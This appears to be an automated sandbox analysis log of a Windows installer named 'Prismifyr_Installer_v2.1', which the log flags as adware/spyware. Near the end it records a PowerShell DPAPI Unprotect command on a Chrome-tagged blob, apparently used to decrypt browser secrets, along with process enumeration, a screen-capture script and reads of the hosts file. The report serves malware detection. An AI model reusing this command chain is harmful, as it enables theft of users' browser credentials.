Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#grammardef-option-expression
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#integrity-metadata-description
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#abstract-opdef-converttoint
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#abstract-opdef-integerpart
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#es-DOMString
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#es-dictionary
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#es-invoking-callback-functions
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webkit.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webrtc.googlesource.com/src/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bluetooth.com/specifications/gatt/characteristics
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bluetooth.com/specifications/gatt/descriptors
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bluetooth.com/specifications/gatt/services
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5093566007214080
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5093566007214080ErrorEventInit7ssJ
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5636954674692096
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5644273861001216.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5682658461876224.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5718547946799104
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5738264052891648
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/6662647093133312
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/6662647093133312InputDeviceCapabilities
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromium.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.khronos.org/registry/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.opensource.org/licenses/bsd-license.php)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8288.html#section-3
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/copyright.html.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/.
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_23dfaacd-9

System Summary

barindex
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile dump: Prismifyr_Installer_v2.1.exe.0.dr 186389504Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile dump: Prismifyr_Installer_v2.1.exe0.0.dr 186389504Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile dump: Prismifyr_Installer_v2.1.exe.5.dr 186389504Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_00406B150_2_00406B15
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_004072EC0_2_004072EC
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_00404C9E0_2_00404C9E
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeProcess token adjusted: SecurityJump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: Number of sections : 15 > 10
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: Number of sections : 15 > 10
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevk_swiftshader.dll, vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2475862062.0000000002E01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameElevate.exeH vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476010965.0000000002E0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameElevate.exeH vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2275595296.0000000006186000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dllb! vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461234245.0000000000849000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevk_swiftshader.dll, vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2411787381.0000000005226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameR vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2478072599.0000000002E15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameElevate.exeH vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2400741511.0000000005220000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dllb! vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476074048.0000000002E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameElevate.exeH vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: // did the user specify their own .sln file?
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: * On Windows, find the first build/*.sln file.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: glob('build/*.sln', function (err, files) {
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: return path.extname(arg) === '.sln'
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sln_path = os.path.splitext(build_file)[0] + options.suffix + ".sln"
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: # GUID is the same whether it's included from base/base.sln or
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: # foo/bar/baz/baz.sln.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: print('Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0])
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: return callback(new Error('Could not find *.sln file. Did you run "configure"?'))
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: """Generate .sln and .vcproj files.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sln_path = build_file_root + options.suffix + ".sln"
Source: classification engineClassification label: mal60.adwa.spyw.winEXE@48/136@0/0
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404722
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeMutant created: \Sessions\1\BaseNamedObjects\mfx_d3d_mutex
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeMutant created: \Sessions\1\BaseNamedObjects\7b4c3a21-e2df-5efd-beb5-591edeb53a62
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3476:120:WilError_03
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC60A.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" "
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name FROM sqlite_master WHERE type='table';
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile read: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe "C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')
